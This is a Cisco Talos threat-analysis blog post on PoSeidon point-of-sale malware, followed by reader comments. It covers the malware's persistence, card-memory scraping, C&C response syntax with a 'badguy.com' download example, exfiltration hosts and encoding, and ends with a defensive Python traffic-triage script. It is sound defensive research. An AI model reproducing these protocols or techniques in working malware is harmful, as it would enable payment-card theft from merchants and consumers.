Submitted URL: http://blogs.cisco.com/security/talos/poseidon'
Effective URL: https://blogs.cisco.com/security/talos/poseidon
Submission: On November 21 via api from US — Scanned from US
THREAT SPOTLIGHT: POSEIDON, A DEEP DIVE INTO POINT OF SALE MALWARE

March 20, 2015
Talos Group

This post was authored by Andrea Allievi, Ben Baker, Nick Biasini, JJ Cummings, Douglas Goddard, William Largent, Angel Villegas, and Alain Zidouemba

Cisco’s Security Solutions (CSS) consists of information security experts with a unique blend of law enforcement, enterprise security and technology security backgrounds. The team works directly with Cisco’s Talos Security Intelligence & Research Group to identify known and unknown threats, quantify and prioritize risk, and minimize future risk.

When consumers make purchases from a retailer, the transaction is processed through Point-of-Sale (PoS) systems. When a credit or debit card is used, a PoS system is used to read the information stored on the magnetic stripe on the back of the credit card. Once this information gets stolen from a merchant, it can be encoded into a magnetic stripe and used with a new card. Criminal markets exist for this valuable information because the attackers are able to easily monetize stolen credit card data. Incidents involving PoS malware have been on the rise, affecting many large organizations as well as small mom-and-pop establishments and garnering a lot of media attention. The presence of large amounts of financial and personal information ensures that these companies and their retail PoS systems will remain attractive targets.

OVERVIEW

There is a new malware family targeting PoS systems, infecting machines to scrape memory for credit card information and exfiltrate that data to servers, primarily on the .ru TLD, for harvesting and likely resale.
This new malware family, which we’ve nicknamed PoSeidon, has a few components. At a high level, it starts with a Loader binary that, upon being executed, will first try to maintain persistence on the target machine in order to survive a possible system reboot. The Loader then contacts a command and control server, retrieving a URL which contains another binary to download and execute. The downloaded binary, FindStr, installs a keylogger and scans the memory of the PoS device for number sequences that could be credit card numbers. Upon verifying that the numbers are in fact credit card numbers, keystrokes and credit card numbers are encoded and sent to an exfiltration server.

TECHNICAL DETAILS

KEYLOGGER

The file with SHA256 334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4 could perhaps be the source of the PoS system compromise. We call this file KeyLogger based on debugging information found in the binary.

Upon execution, this file copies itself to either %SystemRoot%\system32\<filename>.exe or %UserProfile%\<filename>.exe and adds a registry entry under HKLM (or HKCU)\Software\Microsoft\Windows\CurrentVersion\Run.

The file also opens HKCU\Software\LogMeIn Ignition and enumerates the keys for the account sub key, opens it, deletes the PasswordTicket value and obtains the Email value. It also deletes the registry tree HKCU\Software\LogMeIn Ignition\<key>\Profiles\* .

The file sends data to an exfiltration server by POSTing to one of these URIs:
* wondertechmy[.]com/pes/viewtopic.php
* wondertechmy[.]ru/pes/viewtopic.php
* wondwondnew[.]ru/pes/viewtopic.php

The URI format is uid=%I64u&win=%d.%d&vers=%s

The Keylogger component was potentially used to steal passwords and could have been the initial infection vector.

LOADER

The loader for the PoSeidon PoS malware gets its name from debugging information found in the binary.

Upon being run, Loader checks to see if it’s being executed with one of these two file names:
* WinHost.exe
* WinHost32.exe

If it is not, it will make sure that no Windows service is running with the name WinHost. Loader will copy itself to %SystemRoot%\System32\WinHost.exe, overwriting any file in that location that happens to have the same name. Next, Loader will start a service named WinHost. This is done so that it remains running in memory even if the current user logs off.

If Loader is not able to install itself as a service, it will try to find other instances of itself running in memory and terminate them. Subsequently, it will copy itself to %UserProfile%\WinHost32.exe and install the registry key HKCU\Microsoft\Windows\CurrentVersion\Run\\WinHost32. Finally, it will create a new process to execute %UserProfile%\WinHost32.exe.

Now that persistence has been achieved, Loader will delete itself by running the following command:
* cmd.exe /c del <path_to_itself> >> NUL

The instance of Loader running in memory attempts to read configuration data at %SystemRoot%\System32\WinHost.exe.cfg. This file can hold a list of URLs to be added to a list of hardcoded URLs already contained in Loader.
Loader then attempts to contact one of the hardcoded C&C servers.

If one of these domains resolves to an IP address, an HTTP POST is made using the following user-agent string:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

POST data is sent to either:
* <IP ADDRESS>/ldl01/viewtopic.php
* <IP ADDRESS>/pes2/viewtopic.php

POST data follows the format:

uid=%I64u&uinfo=%s&win=%d.%d&bits=%d&vers=%s&build=%s

Loader expects the following response from the C&C server:

{<CommandLetter>:<ArgumentString>}

Example responses:
* {R:http://badguy.com/malwarefilename.exe}
* {b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}

It’s by fetching and executing the executable referenced in the server response that the second part of PoSeidon finds its way to the PoS device.

FINDSTR

The loader for the PoSeidon PoS malware gets its name from debugging information found in the binary.

An embedded PE is extracted through shellcode and execution continues with the embedded binary. This file installs a minimal keylogger that is implemented similarly to the description found here. The data intercepted by this keylogger will later be sent to an exfiltration server.

The PE then cycles through all running processes on the PoS device to look for processes with a security token not associated with the “NT AUTHORITY” domain name. It iterates through all read/write pages within those processes for credit card info.
The malware only looks for number sequences that start with:
* 6, 5, 4 with a length of 16 digits (Discover, Visa, Mastercard)
* 3 with a length of 15 digits (AMEX)

It then uses the Luhn algorithm to verify that the numbers are actually credit or debit card numbers.

Next, DNS resolution is attempted for a set of domains that are some of the known data exfiltration servers.

If one of these domains resolves to an IP address, an HTTP POST is made using the following user-agent string:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

POST data is sent to:

<IP ADDRESS>/pes13/viewtopic.php

Data follows this format:

oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s

Optional POST data (data: credit card numbers, logs: keylogger data):

&data=<XORed_with_0x2A_then_base64_data_unk>
&logs=<XORed_with_0x2A_then_base64_data_unk>

Credit card numbers and keylogger data are sent to the exfiltration server after being XORed and base64 encoded.

The expected response from the exfiltration server is:

This mechanism allows the malware to update itself, based on commands received from the exfiltration server.

LOADER VS FINDSTR

Comparing an unpacked copy of Loader version 11.4 to an unpacked copy of FindStr version 7.1 with Bindiff shows that 62% of the functionality in both samples is the same. The actors behind this malware probably developed some core functionality and compiled it into a library to be used by other projects they are developing.
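
The POST formats and the C&C response syntax described in the Loader and FindStr sections are enough to triage captured proxy or PCAP records. The Python below is an added example, not code from the original post or from Talos; the (method, path, body) record layout, the sample values, and the treatment of '|' as a field separator inside the argument string are assumptions made for the example, and every sample record is constructed.

```python
import base64
import re
from urllib.parse import unquote

XOR_KEY = 0x2A  # single-byte XOR key stated in the write-up

# (label, URI path suffixes, parameters in printf order, optional trailing ones)
SIGNATURES = [
    ("findstr-exfil", ("/pes13/viewtopic.php",),
     ("oprat", "uid", "uinfo", "win", "vers"), ("data", "logs")),
    ("loader-checkin", ("/ldl01/viewtopic.php", "/pes2/viewtopic.php"),
     ("uid", "uinfo", "win", "bits", "vers", "build"), ()),
    ("keylogger-checkin", ("/pes/viewtopic.php",), ("uid", "win", "vers"), ()),
]
PAN_RE = re.compile(r"(?<!\d)(\d{6})(\d{5,6})(\d{4})(?!\d)")
RESPONSE_RE = re.compile(r"^\{([A-Za-z]):(.*)\}$")


def parse_body(body):
    """Split a form body by hand; unquote() (not unquote_plus) keeps base64 '+'."""
    pairs = [p.split("=", 1) for p in body.split("&") if "=" in p]
    return [(key, unquote(value)) for key, value in pairs]


def classify_post(path, body):
    """Return the label of the PoSeidon POST format this request matches, or None."""
    pairs = parse_body(body)
    keys, values = tuple(k for k, _ in pairs), dict(pairs)
    for label, suffixes, required, optional in SIGNATURES:
        head, tail = keys[:len(required)], keys[len(required):]
        if not path.endswith(suffixes) or head != required:
            continue
        if any(k not in optional for k in tail):
            continue
        if not values["uid"].isdigit() or not re.fullmatch(r"\d+\.\d+", values["win"]):
            continue
        if label == "findstr-exfil" and values["oprat"] != "2":
            continue
        return label
    return None


def decode_field(value):
    """Undo the encoding of data= / logs=: base64-decode, then XOR with 0x2A."""
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4))
    except ValueError:  # binascii.Error: truncated or corrupted capture
        return b""
    return bytes(b ^ XOR_KEY for b in raw)


def mask_pans(text):
    """Keep first 6 / last 4 digits so triage notes do not re-expose card data."""
    return PAN_RE.sub(lambda m: m[1] + "*" * len(m[2]) + m[3], text)


def parse_c2_response(text):
    """Parse {<CommandLetter>:<ArgumentString>} into (letter, [fields])."""
    match = RESPONSE_RE.match(text.strip())
    if match is None:
        return None
    # Assumption: '|' separates fields, as in the page's second example response.
    return match.group(1), match.group(2).split("|")


def triage(records):
    """records: iterable of (method, path, body) taken from proxy logs or a PCAP."""
    findings = []
    for method, path, body in records:
        label = classify_post(path, body) if method == "POST" else None
        if label is None:
            continue
        fields = dict(parse_body(body))
        decoded = {name: mask_pans(decode_field(fields[name]).decode("latin-1"))
                   for name in ("data", "logs") if name in fields}
        findings.append({"type": label, "uid": fields["uid"], "decoded": decoded})
    return findings


def encode_sample_field(text):
    """Builds the constructed sample below; mirrors the documented encoding."""
    return base64.b64encode(bytes(b ^ XOR_KEY for b in text.encode())).decode()


# Constructed records (not real traffic); 4111111111111111 is a common test PAN.
SAMPLE_RECORDS = [
    ("POST", "/ldl01/viewtopic.php",
     "uid=1234567890&uinfo=POS01&win=6.1&bits=32&vers=11.4&build=b1"),
    ("POST", "/pes13/viewtopic.php",
     "oprat=2&uid=1234567890&uinfo=POS01&win=6.1&vers=7.1&data="
     + encode_sample_field("4111111111111111")),
    ("POST", "/forum/viewtopic.php", "t=42&p=7"),
    ("GET", "/index.html", ""),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding)
```

Matching on the parameter order as well as the path keeps ordinary forum traffic to viewtopic.php out of the findings, and the decoded fields are masked before they reach an analyst's notes.
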

IOC

Endpoint IOC version:
* Win.Trojan.PoSeidon.RegistryItem.ioc
* Win.Trojan.PoSeidon.ProcessItem.ioc
* Win.Trojan.PoSeidon.FileItem.ioc

Domains and IP addresses of the C&C and exfiltration servers; some IP address entries read "REDACTED at request of Federal Law Enforcement".

CONCLUSION

PoSeidon is another in the growing number of Point-of-Sale malware families targeting PoS systems that demonstrate the sophisticated techniques and approaches of malware authors. Attackers will continue to target PoS systems and employ various obfuscation techniques in an attempt to avoid detection. As long as PoS attacks continue to provide returns, attackers will continue to invest in innovation and development of new malware families. Network administrators will need to remain vigilant and adhere to industry best practices to ensure coverage and protection against advancing malware threats.

Snort Rules: 33836-33852. Please refer to Defense Center or FIREsight management console for updated information.

PROTECTING USERS FROM THESE THREATS

We encourage organizations to consider security best practices, starting with a threat-centric approach. Given the dynamic threat landscape, we advocate this threat-centric and operationalized approach that implements protections across the extended network – and across the full attack continuum – before, during, and after an attack.
This approach is predicated upon superior visibility, continuous control, and advanced threat protection across the extended network and the entire attack continuum.

17 COMMENTS

* John Doe says: March 21, 2015 at 4:35 pm
  “REDACTED at request of Federal Law Enforcement” What’s that?

* Michael Kirkpatrick says: March 23, 2015 at 1:58 am
  There is probably an ongoing investigation being conducted by law enforcement agencies. They don’t want that IP or domain name revealed in case it impacts on their investigation.

* Anonymous says: March 23, 2015 at 10:38 am
  That is beyond stupid. When malware authors read this article, they will know what IPs have been [redacted] and not listed in the report and just null those IPs out and start using new ones…

* Urban C}{aos says: March 24, 2015 at 6:09 am
  This isn’t just for the Malware authors but also for the general snoopy people on the Internet. Botnet C2C traffic may get adulterated by thousands more connections thereby hindering investigations.

* eduard tovt says: May 11, 2015 at 1:51 am
  non rekvalite sitems uniti problems v doskonalenie sistemi kattorie bolhe net na simle besapasnastie nasagelaveka na sypytnika skanivanie is kosmasa nasa ani twklycat orussie kalignie rakety simy ynigtassenie nacii gelaweka na 2018 v okeani pretupas ressdenie was kto iuslessit ifarmaciua amerika prinala resultat unitassenia nacii myslman katowi a rakety masowi parassenie evropi ungtahenie myssicow na simle bydte bititelnie reformcii

* Nick Kelly says: March 23, 2015 at 9:09 am
  The file path is definitely windows. Do we know if this malware can remain persistent on an embedded XP system or just a full Windows install? Thx

* JJ Cummings says: March 23, 2015 at 9:33 am
  We have seen this malware establish persistence on both embedded Windows XP and Windows 7 systems.

* jlindema says: March 24, 2015 at 2:07 pm
  It will be nice when… the information scraped from the POS terminals is either no longer valid, and/or can only be used by the first merchant to ‘claim’ the card number (and not be used over and over again). Tokenization is the key. Final - a startup located in Mtn. View, CA is working on this. Check out: getfinal (dot) com.

* Joel says: March 24, 2015 at 2:14 pm
  I think Apple has already figured this out with Apple Pay..

* Apple Hater says: March 24, 2015 at 2:20 pm
  You mean google wallet?

* Mildar says: March 25, 2015 at 1:14 am
  How do these PoS systems get infected? It is uncommon to search web pages or receive emails on Pay terminals. So USB? (not very effective?) or not updated system -> exploit?

* Marpos says: March 26, 2015 at 6:35 pm
  Mildar is on point. How is this malware propagating? What’s the attack vector.

* TD says: April 4, 2015 at 3:00 am
  Likely USB or the like, you’d be surprised how effective localized infection vectors can be. Ask Target.

* NL says: April 10, 2015 at 3:32 pm
  Can you please provide MD5 Hash for IOC’s above?

* Douglas Held says: April 11, 2015 at 7:08 am
  Authors, thank you for this well written information. I’m really interested to know whether the Loader service stays resident once the attack is underway? In that case, I think the simplest way to detect an infected system would be to check for the registered device name ‘WinHost(32)?’… Correct? Thanks

* Douglas Held says: April 11, 2015 at 10:51 am
  Correction; service name “WinHost”….

* Bradley Cyprus says: April 15, 2015 at 9:09 am
  To answer the question about how stations get infected. Many POS malware infections start with insecure remote access. For example, over the past 12 months, LogMeIn was used insecurely by several POS companies. An account was breached, and the hacker was able to access 100’s of POS stations in an unattended mode. There are ways to use these tools correctly, but many do not.
  For more data about this, look at the Department of Homeland Security brief: http://www.us-cert.gov/sites/default/files/publications/BackoffPointOfSaleMalware.pdf

Comments are closed.